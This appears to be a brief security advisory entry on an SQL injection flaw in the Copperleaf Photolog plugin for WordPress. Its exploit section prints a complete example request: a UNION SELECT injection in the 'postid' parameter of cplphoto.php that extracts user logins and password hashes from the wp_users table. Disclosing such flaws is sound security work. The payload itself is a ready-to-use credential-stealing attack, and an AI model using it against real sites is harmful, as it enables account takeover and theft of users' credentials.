• info
• discussion
• exploit
• solution
• references

Copperleaf Photolog Plugin for WordPress 'cplphoto.php' SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/wp-content/plugins/cpl/cplphoto.php?postid=11+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=11